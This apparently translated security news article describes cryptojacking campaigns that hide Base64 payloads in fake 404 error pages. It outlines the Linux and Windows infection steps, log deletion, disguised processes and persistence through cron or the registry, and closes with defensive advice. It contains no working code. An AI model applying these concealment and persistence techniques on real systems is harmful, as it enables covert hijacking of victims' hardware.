In recent months, several investigations have detected a New trend in the use of 404 error pages for distributing malware, especially on Linux and Windows systems. This method allows cybercriminals to hide payloads on seemingly innocent pages, making them difficult to detect using conventional web analysis and filtering systems.
The manipulated error pages They have become an effective tool for attackers to launch cryptojacking campaigns and other threats, exploiting configuration flaws in Internet-exposed servers and services. This technique represents an additional challenge for security teams, as malicious content is hidden within common HTML tags and goes undetected by most static scanners.
How infection works through modified 404 pages
The core of these campaigns is usually a Loader that requests fake error pages from controlled domains by the attackers. Among the page's own code, hidden in custom bookmarks, is a Base64-encoded block that is decrypted in the victim system's memory, making it very difficult for conventional antivirus software, which scans disks for suspicious files, to detect the intrusion.
In the case of LinuxThe infection process begins with a simple command that downloads and executes a script from a remote server. This script is responsible for removing other miners from the machine, deleting some logs to hinder forensic analysis, and, if you have administrator permissions, optimizing certain system parameters to extract more cryptocurrency. After this preparation, the affected system executes a specific binary—often disguised as a legitimate process—that connects to the attackers' servers and begins mining cryptocurrency continuously.
Meanwhile, in WindowsAttackers use utilities like certutil or invoke-webRequest to download the malware, place it in publicly accessible locations, and inject it into seemingly harmless processes. Shortly afterward, the original file is deleted to erase all traces, and the miner remains active in the background, persisting even after system reboots.
Expansion: Vulnerable web servers and databases
This threat doesn't just affect individual computers. A substantial portion of recent attacks are initiated through compromised web servers, such as those running Tomcat or misconfigured cloud services. Criminals can exploit weak credentials or exposed PostgreSQL databases to upload their malware and then use the server itself as a launch pad for other devices within the network.
In fact, a significant number of victims are companies whose dashboards only show a sudden increase in energy consumption and performance degradation, common symptoms when hardware is being exploited to secretly mine cryptocurrencies.
Concealment and persistence techniques
One of the most worrying aspects of these campaigns is the sophistication of their cover-up mechanisms. malware disguises itself as legitimate processes (with names similar to system components) and schedules periodic tasks—like cron jobs in Linux or entries in the Windows registry—to ensure that the miner is automatically restarted if stopped by the user or security software.
This approach allows attackers to maintain control of the device for long periods of time without raising suspicion, while the financial losses—both from power consumption and lost productivity—silently accumulate.
To defend against these threats, administrators and users should constantly review their system configurations. It's advisable to shut down unnecessary services and databases, as well as analyze traffic for atypical behavior, such as repeated connections to unknown domains or unusual spikes in CPU usage.
La proactive monitoring and the use of specialized tools that inspect memory and running processes are essential to detect and neutralize these attacks, which increasingly employ more subtle and advanced techniques to go unnoticed.
The use of error pages as an attack vector demonstrates how cybercriminals continue to innovate their strategies to exploit any vulnerability in Linux and Windows systems. Maintaining an active defensive posture, applying security patches, and limiting the exposure of critical services to the Internet are essential guidelines for reducing the risk and limiting the impact of these silent infections.
